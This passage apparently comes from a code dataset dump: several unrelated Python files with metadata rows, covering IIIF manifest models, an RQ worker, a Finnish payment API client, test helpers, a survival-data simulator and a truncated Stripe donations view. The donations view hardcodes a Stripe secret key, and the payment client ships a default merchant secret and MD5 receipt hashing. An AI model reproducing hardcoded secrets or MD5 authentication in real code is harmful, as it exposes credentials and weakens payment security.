_rights_graph = None
def license_label(self, lang='en'):
'''Get the text label for the rights license. Uses local
value from edm rights if available; otherwise uses
data for the URI to get the preferred label or title.'''
# Some manifests have a seeAlso data contains an "edm_rights"
# section with a label for the rights statement.
# Use that if available (NOTE: ignores specified language)
# NOTE: possibly PUL specific, but shouldn't hurt to look locally first
for data in self.extra_data.values():
if 'edm_rights' in data and 'pref_label' in data['edm_rights']:
return data['edm_rights']['pref_label']
# if license/rights label is not available locally, get via uri
if self._rights_graph is None:
# if license is defined and a url
if self.license and urllib.parse.urlparse(self.license).scheme in ['http', 'https']:
self._rights_graph = rdflib.Graph()
try:
# rights statement org does content-negotiation for json-jd,
# but rdflib doesn't handle that automatically
if 'rightsstatements.org' in self.license:
resp = requests.get(self.license,
headers={'Accept': 'application/json'},
allow_redirects=False)
if resp.status_code == requests.codes.see_other:
self._rights_graph.parse(resp.headers['location'], format='json-ld')
# creative commons doesn't support content negotiation,
# but you can add rdf to the end of the url
elif 'creativecommons.org' in self.license:
rdf_uri = '/'.join([self.license.rstrip('/'), 'rdf'])
self._rights_graph.parse(rdf_uri)
except Exception:
# possible to get an exception when parsing the
# rdf, maybe on the request; don't choke if we do!
                # NOTE: using generic Exception here because unfortunately
# that is what rdflib raises when it can't parse RDF
pass
# get the preferred label for this license in the requested language;
# returns a list of label, value; use the first value
if self._rights_graph:
license_uri = rdflib.URIRef(self.license)
preflabel = self._rights_graph.preferredLabel(license_uri,
lang=lang)
if preflabel:
# convert rdflib Literal to string
return str(preflabel[0][1])
# otherwise, get dc title
# iterate over all titles and return one with a matching language code
for title in self._rights_graph.objects(subject=license_uri, predicate=DC.title):
if title.language == lang:
return str(title)
class IIIFImage(iiif.IIIFImageClient):
'''Subclass of :class:`piffle.iiif.IIIFImageClient`, for generating
IIIF Image URIs for manifest canvas images.'''
#: long edge size for single page display
single_page_size = 1000
#: long edge size for thumbnail
thumbnail_size = 300
#: long edge size for mini thumbnail
mini_thumbnail_size = 100
thumbnail_format = getattr(settings, 'DJIFFY_THUMBNAIL_FORMAT', 'png')
def thumbnail(self):
'''thumbnail'''
return self.size(height=self.thumbnail_size, width=self.thumbnail_size,
exact=True).format(self.thumbnail_format)
def mini_thumbnail(self):
'''mini thumbnail'''
return self.size(height=self.mini_thumbnail_size,
width=self.mini_thumbnail_size, exact=True) \
.format(self.thumbnail_format)
def page_size(self):
        '''page size for display: :attr:`single_page_size` on the long edge'''
return self.size(height=self.single_page_size,
width=self.single_page_size, exact=True)
class Canvas(models.Model):
'''Minimal db model representation of a canvas from an IIIF manifest'''
#: label
label = models.TextField()
#: short id extracted from URI
short_id = models.CharField(max_length=255)
#: URI
uri = models.URLField()
#: URL of IIIF image for this canvas
iiif_image_id = models.URLField()
    #: :class:`Manifest` this canvas belongs to
manifest = models.ForeignKey(Manifest, related_name='canvases',
on_delete=models.CASCADE)
#: boolean flag to indicate if this canvas should be used as thumbnail
thumbnail = models.BooleanField(default=False)
#: order of this canvas within associated manifest primary sequence
order = models.PositiveIntegerField()
# (for now only stores a single sequence, so just store order on the page)
# format? size? (ocr text eventually?)
#: extra data not otherwise given its own field, serialized as json
extra_data = JSONField(load_kwargs={'object_pairs_hook': OrderedDict},
default=OrderedDict)
class Meta:
ordering = ["manifest", "order"]
verbose_name = 'IIIF Canvas'
verbose_name_plural = 'IIIF Canvases'
unique_together = ("short_id", "manifest")
# add custom permissions; change and delete provided by django
permissions = (
('view_manifest', 'Can view %s' % verbose_name),
)
def __str__(self):
return '%s %d (%s)%s' % (self.manifest, self.order + 1, self.label,
'*' if self.thumbnail else '')
@property
def image(self):
'''Associated IIIF image for this canvas as :class:`IIIFImage`'''
# NOTE: piffle iiif image wants service & id split out.
# Should update to handle iiif image ids as provided in manifests
# for now, split into service and image id. (is this reliable?)
return IIIFImage(*self.iiif_image_id.rsplit('/', 1))
@property
def plain_text_url(self):
'''Return plain text url for a canvas if one exists'''
rendering = self.extra_data.get('rendering', None)
if rendering:
# handle both cases where this is a list and where it is just
# a dictionary, to be safe
if isinstance(rendering, list):
for item in rendering:
# iterate over the list and return the first plain text url
# we find
if 'format' in item and item['format'] == 'text/plain':
return item['@id']
else:
# otherwise, if it's a dictionary, check if it's plaintext and
# return
if 'format' in rendering \
and rendering['format'] == 'text/plain':
return rendering['@id']
# finally return None if no plain text is available or no rendering
return None
@property
def width(self):
return self.extra_data.get('width', None)
@property
def height(self):
return self.extra_data.get('height', None)
def get_absolute_url(self):
        '''URL for this canvas within the django site'''
return reverse('djiffy:canvas', args=[self.manifest.short_id, self.short_id])
def next(self):
        '''Next canvas after this one in sequence (within manifest
        primary sequence). Returns None if there is no next
        canvas.'''
return Canvas.objects.filter(manifest=self.manifest, order__gt=self.order) \
.first()
def prev(self):
        '''Previous canvas before this one in sequence
        (within manifest primary sequence). Returns None
        if there is no previous canvas.'''
return Canvas.objects.filter(manifest=self.manifest, order__lt=self.order) \
.last()
def admin_thumbnail(self):
'''thumbnail for convenience display in admin interface'''
return format_html('<img src="{}" />', self.image.mini_thumbnail())
admin_thumbnail.short_description = 'Thumbnail'
class IIIFPresentation(AttrMap):
''':class:`attrdict.AttrMap` subclass for read access to IIIF Presentation
content'''
# TODO: document sample use, e.g. @ fields
at_fields = ['type', 'id', 'context']
@classmethod
def from_file(cls, path):
        '''Initialize :class:`IIIFPresentation` from a file.'''
with open(path) as manifest:
data = json.loads(manifest.read())
return cls(data)
@classmethod
def from_url(cls, uri):
        '''Initialize :class:`IIIFPresentation` from a URL.
:raises: :class:`IIIFException` if URL is not retrieved successfully,
if the response is not JSON content, or if the JSON cannot be parsed.
'''
response = get_iiif_url(uri)
if response.status_code == requests.codes.ok:
try:
return cls(response.json())
except json.decoder.JSONDecodeError as err:
# if json fails, two possibilities:
# - we didn't actually get json (e.g. redirect for auth)
if 'application/json' not in response.headers['content-type']:
raise IIIFException('No JSON found at %s' % uri)
# - there is something wrong with the json
raise IIIFException('Error parsing JSON for %s: %s' %
(uri, err))
raise IIIFException('Error retrieving manifest at %s: %s %s' %
(uri, response.status_code, response.reason))
@classmethod
def is_url(cls, url):
'''Utility method to check if a path is a url or file'''
return urllib.parse.urlparse(url).scheme != ""
@classmethod
def from_file_or_url(cls, path):
        '''Initialize :class:`IIIFPresentation` from a file or a url.'''
if os.path.isfile(path):
return cls.from_file(path)
elif cls.is_url(path):
return cls.from_url(path)
else:
raise IIIFException('File not found: %s' % path)
@classmethod
def short_id(cls, uri):
'''Generate a short id from full manifest/canvas uri identifiers
for use in local urls. Logic is based on the recommended
url pattern from the IIIF Presentation 2.0 specification.'''
# shortening should work reliably for uris that follow
# recommended url patterns from the spec
# http://iiif.io/api/presentation/2.0/#a-summary-of-recommended-uri-patterns
# manifest: {scheme}://{host}/{prefix}/{identifier}/manifest
# canvas: {scheme}://{host}/{prefix}/{identifier}/canvas/{name}
# remove trailing /manifest at the end of the url, if present
if uri.endswith('/manifest'):
uri = uri[:-len('/manifest')]
# split on slashes and return the last portion
return uri.split('/')[-1]
def __getattr__(self, key):
"""
Access an item as an attribute.
"""
# override getattr to allow use of keys with leading @,
# which are otherwise not detected as present and not valid
at_key = self._handle_at_keys(key)
if key not in self or \
(key not in self.at_fields and at_key not in self) or \
not self._valid_name(key):
raise AttributeError(
"'{cls}' instance has no attribute '{name}'".format(
cls=self.__class__.__name__, name=key
)
)
return self._build(self[key])
def _handle_at_keys(self, key):
if key in self.at_fields:
key = '@%s' % key
return key
def __getitem__(self, key):
"""
Access a value associated with a key.
"""
return self._mapping[self._handle_at_keys(key)]
def __setitem__(self, key, value):
"""
Add a key-value pair to the instance.
"""
self._mapping[self._handle_at_keys(key)] = value
def __delitem__(self, key):
"""
Delete a key-value pair
"""
del self._mapping[self._handle_at_keys(key)]
@property
def first_label(self):
# label can be a string or list of strings
if isinstance(self.label, str):
return self.label
else:
return self.label[0]
| 38.579075 | 96 | 0.614531 | 1,934 | 15,856 | 4.930714 | 0.226474 | 0.01573 | 0.011011 | 0.008389 | 0.216758 | 0.181942 | 0.159501 | 0.128775 | 0.112206 | 0.094589 | 0 | 0.002409 | 0.293264 | 15,856 | 410 | 97 | 38.673171 | 0.848563 | 0.337916 | 0 | 0.19457 | 0 | 0 | 0.075468 | 0.002278 | 0 | 0 | 0 | 0.004878 | 0 | 1 | 0.144796 | false | 0.00905 | 0.063348 | 0.0181 | 0.497738 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad6f069ab18356a02f0885df946a9c125198a426 | 440 | py | Python | xcessiv/scripts/runworker.py | KhaledTo/xcessiv | a48dff7d370c84eb5c243bde87164c1f5fd096d5 | [
"Apache-2.0"
] | 1,362 | 2017-05-23T15:02:18.000Z | 2022-03-28T22:42:21.000Z | xcessiv/scripts/runworker.py | KhaledTo/xcessiv | a48dff7d370c84eb5c243bde87164c1f5fd096d5 | [
"Apache-2.0"
] | 40 | 2017-05-23T17:59:05.000Z | 2019-07-03T13:08:14.000Z | xcessiv/scripts/runworker.py | KhaledTo/xcessiv | a48dff7d370c84eb5c243bde87164c1f5fd096d5 | [
"Apache-2.0"
] | 123 | 2017-05-24T05:49:34.000Z | 2022-02-06T17:54:32.000Z | from rq import Connection, Worker
from redis import Redis
def runworker(app):
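    """Start an RQ worker on the app's configured queues, connecting to
    Redis with the settings taken from the Flask app config."""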
REDIS_HOST = app.config['REDIS_HOST']
REDIS_PORT = app.config['REDIS_PORT']
REDIS_DB = app.config['REDIS_DB']
QUEUES = app.config['QUEUES']
redis_conn = Connection(Redis(REDIS_HOST,
REDIS_PORT,
REDIS_DB))
with redis_conn:
w = Worker(QUEUES)
w.work()
| 24.444444 | 45 | 0.572727 | 52 | 440 | 4.634615 | 0.346154 | 0.149378 | 0.174274 | 0.149378 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.331818 | 440 | 17 | 46 | 25.882353 | 0.819728 | 0 | 0 | 0 | 0 | 0 | 0.077273 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.153846 | 0 | 0.230769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad70f5d5b8addfdc17a654b487758488e6718ac5 | 13,561 | py | Python | verkkomaksut/__init__.py | fastmonkeys/python-verkkomaksut | 93b549f60a4488c5ce91849c7a2a46e55c770115 | [
"BSD-3-Clause"
] | 1 | 2016-11-08T07:30:12.000Z | 2016-11-08T07:30:12.000Z | verkkomaksut/__init__.py | fastmonkeys/python-verkkomaksut | 93b549f60a4488c5ce91849c7a2a46e55c770115 | [
"BSD-3-Clause"
] | null | null | null | verkkomaksut/__init__.py | fastmonkeys/python-verkkomaksut | 93b549f60a4488c5ce91849c7a2a46e55c770115 | [
"BSD-3-Clause"
] | 1 | 2018-04-04T10:00:32.000Z | 2018-04-04T10:00:32.000Z | # -*- coding: utf-8 -*-
"""
verkkomaksut
~~~~~~~~~~~~
Python wrapper for the JSON API of Suomen Verkkomaksut.
:copyright: (c) 2013 by Janne Vanhala.
:license: BSD, see LICENSE for more details.
"""
__version__ = '0.2.0'
import hashlib
import json
import requests
class VerkkomaksutException(Exception):
"""This exception is raised when the request made to the Verkkomaksut API
is invalid, or some other error occurs in the usage of the API."""
def __init__(self, code, message):
#: Error code is a unique string identifying the error. Possible error
#: codes are listed in the `documentation`_ of Suomen Verkkomaksut
#: REST API .
#:
#: .. _documentation: http://docs.verkkomaksut.fi/en/ch03s03.html
self.code = code
#: An error description of the error in chosen localization. This error
#: description is not meant to be displayed to the end-user.
self.message = message
class Contact(object):
"""This class represents the payer of a payment."""
def __init__(self, first_name, last_name, email, street, postal_code,
postal_office, country, telephone=None, mobile=None,
company_name=None):
#: Payer's first name.
self.first_name = first_name
#: Payer's surname.
self.last_name = last_name
#: Payer's email address.
self.email = email
#: Company name.
self.company_name = company_name
#: Payer's telephone number.
self.telephone = telephone
#: Payer's mobile number.
self.mobile = mobile
#: Payer's street address.
self.street = street
#: Payer's postal code.
self.postal_code = postal_code
#: Payer's post office.
self.postal_office = postal_office
#: Payer's country. The data are sent as a two-numbered character
#: string in ISO-3166-1 standard format. For example, Finnish is FI
#: and Swedish SE. The data are used for verifying credit history,
#: and is thus required.
self.country = country
@property
def json(self):
"""JSON representation of this contact."""
return {
'telephone': self.telephone,
'mobile': self.mobile,
'email': self.email,
'firstName': self.first_name,
'lastName': self.last_name,
'companyName': self.company_name,
'address': {
'street': self.street,
'postalCode': self.postal_code,
'postalOffice': self.postal_office,
'country': self.country
}
}
class Payment(object):
def __init__(self, order_number, contact, success_url, failure_url,
notification_url, **options):
#: Order number is a string of characters identifying the customer's
#: purchase and the used webshop software creates it.
self.order_number = order_number
#: Reference number is sent to bank by default and is automatically
#: created. In those payment methods that are used as an interface,
        #: this field can contain your own reference number, which is sent to the
#: bank service instead of the automatically generated reference
#: number.
self.reference_number = options.get('reference_number')
#: Any data about the order in text format can be sent to the payment
#: system. The most usual pieces of data are customer name and contact
#: information and order product information. They are shown in the
#: Merchant's Panel in payment details.
self.description = options.get('description')
        #: Payment currency. Value must be EUR for the Finnish banks, otherwise
#: the payment will not be accepted.
self.currency = options.get('currency', 'EUR')
#: Localisation defines default language for the payment method
#: selection page and presentation format for the sums. Available
#: localisations are "fi_FI", "sv_SE" and "en_US". The default
#: localisation is always "fi_FI".
self.locale = options.get('locale', 'fi_FI')
#: A flag indicating whether the product row prices include value
#: added tax. If `True` VAT is included in the shown price; otherwise
#: it will be added. Therefore, set this to `True`, if the prices in
#: your webshop include value added tax, and `False` if the prices do
#: not include value added tax.
self.include_vat = options.get('include_vat', True)
self.contact = contact
#: A list of products. There must be at least one product, and the
#: maximum number of products is 500.
self.products = []
#: URL to which user is directed after a successful payment.
self.success_url = success_url
#: URL to which user is directed after a cancelled or failed payment.
self.failure_url = failure_url
        #: URL to which user is directed, if the payment is pending. This
        #: status is used with the NetPosti payment method. After the actual
        #: payment, the payment is confirmed with a notification request.
self.pending_url = options.get('pending_url')
#: URL requested when the payment is marked as successful. The URL is
#: requested with the same GET parameters as success address when the
#: payment is made. Notification request is typically executed within
#: a few minutes from the payment.
self.notification_url = notification_url
@property
def currency(self):
return self._currency
@currency.setter
def currency(self, value):
if value != 'EUR':
raise ValueError("Currently EUR is the only supported currency.")
self._currency = value
@property
def locale(self):
return self._locale
@locale.setter
def locale(self, value):
if value not in ('fi_FI', 'sv_SE', 'en_US'):
raise ValueError("Given locale is not supported: %r" % value)
self._locale = value
@property
def json(self):
return {
'orderNumber': self.order_number,
'referenceNumber': self.reference_number,
'description': self.description,
'currency': self.currency,
'locale': self.locale,
'urlSet': {
'success': self.success_url,
'failure': self.failure_url,
'pending': self.pending_url,
'notification': self.notification_url
},
'orderDetails': {
'includeVat': '1' if self.include_vat else '0',
'contact': self.contact.json,
'products': [product.json for product in self.products]
}
}
class Product(object):
TYPE_NORMAL = 1
TYPE_POSTAGE = 2
TYPE_PROCESSING = 3
def __init__(self, title, price, vat, amount=1, code=None, discount=0, type=TYPE_NORMAL):
#: Product name in free format. The product title is shown in the
#: Merchant's Panel and on Klarna service invoices on a product row.
#: Product details are shown also on the payment method selection page.
self.title = title
#: Optional product number. Using a product number may help in
#: aligning a correct product.
self.code = code
#: If an order consists of several samples of the same product, you
#: can enter the number of products here and there won't be a need for
#: adding each product as a separate row. Usually this field contains
#: value 1.
self.amount = amount
#: Price for one product. If the field payment includes VAT, this is
#: a price excluding VAT. Otherwise, this is a price including VAT.
#: The price can also be negative if you want to add discounts to the
#: service. However, the total amount of the product rows must always
#: be bigger than 0.
self.price = price
#: Tax percentage for a product. The value added tax in Finland for
#: most products is 23.
self.vat = vat
#: If you have reduced the product price, you can show the discount
#: percentage as a figure between 0 and 100 in this field. Default
#: discount value is 0.
self.discount = discount
#: A type can be specified for the product row. `Product.TYPE_NORMAL`
#: refers to a normal product row. `Product.TYPE_POSTAGE` can be used
#: for postage and `Product.TYPE_PROCESSING` for processing costs.
#: `Product.TYPE_NORMAL` can be used for all rows, but postage and
#: processing costs cannot be differentiated from other rows to the
#: invoice. Default value for the field is `Product.TYPE_NORMAL`.
self.type = type
@property
def type(self):
return self._type
@type.setter
def type(self, value):
if value not in (
Product.TYPE_NORMAL,
Product.TYPE_POSTAGE,
Product.TYPE_PROCESSING
):
raise ValueError('Given product type not supported: %r' % value)
self._type = value
@property
def json(self):
return {
'title': self.title,
'code': self.code,
'amount': self.amount,
'price': self.price,
'vat': self.vat,
'discount': self.discount,
'type': self.type
}
class Client(object):
SERVICE_URL = "https://payment.verkkomaksut.fi/api-payment/create"
def __init__(self, merchant_id='13466',
merchant_secret='6pKF4jkv97zmqBJ3ZL8gUw5DfT2NMQ'):
"""
Initialize the client with your own merchant id and merchant secret.
:param merchant_id: Mercant ID is given to you by Suomen Verkkomaksut
when you make the contract. Default is the test merchant account.
        :param merchant_secret: Merchant secret is given to you by Suomen
            Verkkomaksut. Default is the test merchant account.
"""
self.merchant_id = merchant_id
self.merchant_secret = merchant_secret
self.session = requests.Session()
self.session.auth = (merchant_id, merchant_secret)
self.session.headers = {
'Accept': 'application/json',
'Content-Type': 'application/json',
'X-Verkkomaksut-Api-Version': '1'
}
def create_payment(self, payment):
"""Creates a new payment and returns a `dict` with the following data:
`orderNumber`
:param payment: a `Payment` object
"""
response = self.session.post(self.SERVICE_URL,
data=json.dumps(payment.json)
)
if response.status_code != requests.codes.created:
data = json.loads(response.content)
raise VerkkomaksutException(
code=data['errorCode'],
message=data['errorMessage']
)
data = json.loads(response.content)
return {
'order_number': data['orderNumber'],
'token': data['token'],
'url': data['url']
}
def _calculate_payment_receipt_hash(self, *params):
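        # The authcode is the uppercased MD5 hex digest of the pipe-joined
        # receipt parameters with the merchant secret appended.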
base = '|'.join(params + (self.merchant_secret,))
        return hashlib.md5(base.encode('utf-8')).hexdigest().upper()  # md5 needs bytes on Python 3
def _validate_payment_receipt_parameters(self, authcode, *params):
hash_ = self._calculate_payment_receipt_hash(*params)
return authcode == hash_
def validate_successful_payment(self, authcode, order_number, timestamp,
paid, method):
"""
Validates parameters sent by Suomen Verkkomaksut to the success URL or
pending URL after a successful payment. The parameters must be validated
in order to avoid hacking attempts to confirm payment. Returns `True`
when the parameters are valid, and `False` otherwise.
:param authcode: A hash value calculated by payment system.
:param order_number: The same order number that was previously sent to
the payment system. Order number uniquely identifies each payment.
:param timestamp: A Unix timestamp produced by Suomen Verkkomaksut used
for calculating the hash.
:param paid: A 10-character payment code, which is part of payment
confirmation. In case of a pending payment, this parameter is
always "0000000000".
:param method: The payment method used.
"""
return self._validate_payment_receipt_parameters(
authcode, order_number, timestamp, paid, method
)
def validate_failed_payment(self, authcode, order_number, timestamp):
"""
Validates parameters sent by Suomen Verkkomaksut to the failure URL
after a cancelled or failed payment.
:param authcode: A hash value calculated by payment system.
:param order_number: The same order number that was previously sent to
the payment system. Order number uniquely identifies each payment.
:param timestamp: A Unix timestamp produced by Suomen Verkkomaksut used
for calculating the hash.
"""
return self._validate_payment_receipt_parameters(
authcode, order_number, timestamp
)
| 37.774373 | 93 | 0.621709 | 1,632 | 13,561 | 5.077206 | 0.23652 | 0.021241 | 0.006638 | 0.013517 | 0.166787 | 0.141685 | 0.097755 | 0.094135 | 0.075308 | 0.075308 | 0 | 0.006629 | 0.299167 | 13,561 | 358 | 94 | 37.879888 | 0.865215 | 0.453506 | 0 | 0.113095 | 0 | 0 | 0.097718 | 0.007989 | 0 | 0 | 0 | 0 | 0 | 1 | 0.113095 | false | 0 | 0.017857 | 0.029762 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad734e724495c3380fd814bc64d0a91e00a38b80 | 1,231 | py | Python | hfta/ops/utils.py | UofT-EcoSystem/hfta | 3ecde20363570b65f4f9656ff3204fe31f2ddcc0 | [
"MIT"
] | 24 | 2021-04-06T20:36:10.000Z | 2022-02-26T17:03:33.000Z | hfta/ops/utils.py | UofT-EcoSystem/hfta | 3ecde20363570b65f4f9656ff3204fe31f2ddcc0 | [
"MIT"
] | 20 | 2021-04-02T00:51:34.000Z | 2022-03-29T15:00:08.000Z | hfta/ops/utils.py | UofT-EcoSystem/hfta | 3ecde20363570b65f4f9656ff3204fe31f2ddcc0 | [
"MIT"
] | 5 | 2021-04-11T20:07:32.000Z | 2021-06-14T06:41:05.000Z | import torch
import numpy as np
import re
RE_PARSE_RATIO = re.compile(r'Mismatched elements: (\d+) / (\d+)')
def testcase_automator(testcase, configs):
print('Running testcase: {} ...'.format(testcase.__name__))
for name, vals in configs.items():
print('\tTesting along {} ...'.format(name))
for val in vals:
print('\t\tTry {}={}'.format(name, val))
kwargs = {name: val}
testcase(**kwargs)
def dump_error_msg(e):
""" Dump out the exception e message """
print('\t\t-> Failed with error message:')
print('[Start] ==============================================')
print(e)
print('[ End ] ==============================================\n')
def assert_allclose(
actual,
desired,
rtol=1e-07,
atol=0,
equal_nan=True,
err_msg='',
verbose=True,
population_threshold=0.0,
):
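  # Wraps numpy's assert_allclose but tolerates mismatches: if the fraction
  # of mismatched elements (parsed from numpy's error message) is below
  # population_threshold, the AssertionError is swallowed.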
try:
np.testing.assert_allclose(
actual,
desired,
rtol=rtol,
atol=atol,
equal_nan=equal_nan,
err_msg=err_msg,
verbose=verbose,
)
except AssertionError as e:
m = RE_PARSE_RATIO.search(str(e))
if not m:
raise e
else:
if (int(m.group(1)) / int(m.group(2))) >= population_threshold:
raise e
| 23.226415 | 69 | 0.552396 | 151 | 1,231 | 4.364238 | 0.490066 | 0.036419 | 0.036419 | 0.081942 | 0.094082 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008466 | 0.232331 | 1,231 | 52 | 70 | 23.673077 | 0.688889 | 0.025995 | 0 | 0.136364 | 0 | 0 | 0.198992 | 0.078925 | 0 | 0 | 0 | 0 | 0.068182 | 1 | 0.068182 | false | 0 | 0.068182 | 0 | 0.136364 | 0.159091 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad74d62eb759429eb09905a06a2ab7aa0bb16a69 | 4,086 | py | Python | Simulation/data_simulation_base.py | reylined/TransformerJM | 1f551dd4f00c0b9c73bc93bf6f87450d4392fe34 | [
"MIT"
] | null | null | null | Simulation/data_simulation_base.py | reylined/TransformerJM | 1f551dd4f00c0b9c73bc93bf6f87450d4392fe34 | [
"MIT"
] | null | null | null | Simulation/data_simulation_base.py | reylined/TransformerJM | 1f551dd4f00c0b9c73bc93bf6f87450d4392fe34 | [
"MIT"
] | null | null | null | import numpy as np
import pandas as pd
import scipy.integrate as integrate
import scipy.optimize as optimize
def simulate_JM_base(I, obstime, miss_rate=0.1, opt="none", seed=None):
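    # note: miss_rate is accepted but currently unused in this function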
if seed is not None:
np.random.seed(seed)
J = len(obstime)
#### longitudinal submodel ####
beta0 = np.array([1.5,2,0.5],)
beta1 = np.array([2,-1,1])
betat = np.array([1.5, -1, 0.6])
b_var = np.array([1,1.5,2])
e_var = np.array([1,1,1])
rho = np.array([-0.2,0.1,-0.3])
b_Sigma = np.diag(b_var)
b_Sigma[0,1] = b_Sigma[1,0] = np.sqrt(b_var[0]*b_var[1])*rho[0]
b_Sigma[0,2] = b_Sigma[2,0] = np.sqrt(b_var[0]*b_var[2])*rho[1]
b_Sigma[1,2] = b_Sigma[2,1] = np.sqrt(b_var[1]*b_var[2])*rho[2]
X = np.random.normal(3,1,size=I)
ranef = np.random.multivariate_normal(mean=[0,0,0], cov=b_Sigma, size=I)
mean_long = beta0 + np.outer(X,beta1)
eta_long = mean_long + ranef
if opt=="none" or opt=="nonph":
gamma = np.array([-4,-2])
alpha = np.array([0.2,-0.2,0.4])
x1 = np.random.binomial(n=1,p=0.5,size=I)
x2 = np.random.normal(size=I)
W = np.stack((x1,x2), axis=1)
eta_surv = W@gamma + eta_long@alpha
base = W[...,np.newaxis]
if opt=="interaction":
gamma = np.array([-4,-2,3])
alpha = np.array([0.2,-0.2,0.4])
x1 = np.random.binomial(n=1,p=0.5,size=I)
x2 = np.random.normal(size=I)
x3 = x1*x2
W = np.stack((x1,x2,x3), axis=1)
eta_surv = W@gamma + eta_long@alpha
base = np.stack((x1,x2), axis=1)
base = base[...,np.newaxis]
#Simulate Survival Times using Inverse Sampling Transform
scale = np.exp(-7)
U = np.random.uniform(size=I)
alpha_beta = alpha@betat
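    # CHF(tau) returns the survival probability S(tau) = exp(-H(tau)), where
    # the cumulative hazard H comes from numerically integrating the hazard
    # h(t); brentq below then solves S(T) = U (inverse transform sampling).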
def CHF(tau):
def h(t):
if opt=="none" or opt=="interaction":
return scale * np.exp(eta_surv[i] + alpha_beta*t)
if opt=="nonph":
return scale * np.exp(eta_surv[i] + 3*x2[i]*np.sin(t) + alpha_beta*t)
return np.exp(-1 * integrate.quad(lambda xi: h(xi),0,tau)[0])
Ti = np.empty(I)
Ti[:] = np.NaN
for i in range(0,I):
Ti[i] = optimize.brentq(lambda xi: U[i]-CHF(xi), 0, 100)
#Get true survival probabilities
true_prob = np.ones((I, len(obstime)))
for i in range(0,I):
for j in range(1,len(obstime)):
tau = obstime[j]
true_prob[i,j] = CHF(tau)
C = np.random.uniform(low=obstime[3], high=obstime[-1]+25, size=I)
C = np.minimum(C, obstime[-1])
event = Ti<C
true_time = np.minimum(Ti, C)
# round true_time up to nearest obstime
time = [np.min([obs for obs in obstime if obs-t>=0]) for t in true_time]
subj_obstime = np.tile(obstime, reps=I)
pred_time = np.tile(obstime, reps=I)
mean_long = np.repeat(mean_long, repeats=J, axis=0)
eta_long = np.repeat(eta_long, repeats=J, axis=0)
long_err = np.random.multivariate_normal(mean=[0,0,0], cov=np.diag(e_var), size=I*J)
Y = np.empty((I*J,3))
Y_pred = np.empty((I*J,3))
for i in range(0,3):
Y[:,i] = eta_long[:,i] + betat[i]*subj_obstime + long_err[:,i]
Y_pred[:,i] = eta_long[:,i] + betat[i]*pred_time + long_err[:,i]
true_prob = true_prob.flatten()
ID = np.repeat(range(0,I), repeats=J)
visit = np.tile(range(0,J), reps=I)
data = pd.DataFrame({"id":ID, "visit":visit, "obstime":subj_obstime, "predtime":pred_time,
"time":np.repeat(time,repeats=J),
"event":np.repeat(event,repeats=J),
"Y1":Y[:,0],"Y2":Y[:,1],"Y3":Y[:,2],
"X1":np.repeat(base[:,0],repeats=J),
"X2":np.repeat(base[:,1],repeats=J),
"pred_Y1":Y_pred[:,0],"pred_Y2":Y_pred[:,1],
"pred_Y3":Y_pred[:,2],"true":true_prob})
return data
| 35.224138 | 95 | 0.530103 | 675 | 4,086 | 3.111111 | 0.201481 | 0.038095 | 0.007143 | 0.012857 | 0.305714 | 0.208095 | 0.168571 | 0.145714 | 0.130476 | 0.09619 | 0 | 0.049536 | 0.288546 | 4,086 | 115 | 96 | 35.530435 | 0.672859 | 0.035977 | 0 | 0.116279 | 0 | 0 | 0.028856 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034884 | false | 0 | 0.046512 | 0 | 0.127907 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad75f9c108a1269f3f0bb233116aae64ec6ea0c4 | 1,964 | py | Python | donations/views.py | Ascensiony/Software-Dev-Project | 85513737ae4a4b76fa0cfdab579b037d33b72faf | [
"MIT"
] | 2 | 2021-03-05T01:38:24.000Z | 2021-03-19T21:11:14.000Z | donations/views.py | yabhi0807/Software-Dev-Project | 85513737ae4a4b76fa0cfdab579b037d33b72faf | [
"MIT"
] | 7 | 2021-04-08T21:12:42.000Z | 2022-03-12T00:13:59.000Z | donations/views.py | venky012/ase-1-site | 877e36344c82567d3ebc7b0f29a2757da2a7f071 | [
"MIT"
] | 4 | 2020-02-17T09:47:39.000Z | 2020-02-22T12:11:18.000Z | from django.shortcuts import render, redirect
from django.urls import reverse
from django.http import HttpResponseNotAllowed, JsonResponse
from .models import DonatorInfo
from django.conf import settings
import stripe
stripe.api_key = "sk_test_51GwRq2I7M5l47LQTANTu4qmSu5hi6FBlXfcKJiEvhbHjnAbyYgzMFBTGvGCDgYNpRVwx5qYG1e7aRjMaF4Qp0pWS00L3SVg6AB"
def donateus(request):
context = {
'donators': DonatorInfo.objects.all(),
'amount_raised': int(DonatorInfo.objects.last().total_amount if DonatorInfo.objects.last() else 5647)
}
return render(request, 'donations/donations.html', context)
def index(request):
return render(request, 'donations/index.html')
def charge(request):
    if request.method != 'POST':
        return HttpResponseNotAllowed(['POST'])
    amount = int(request.POST['amount'])
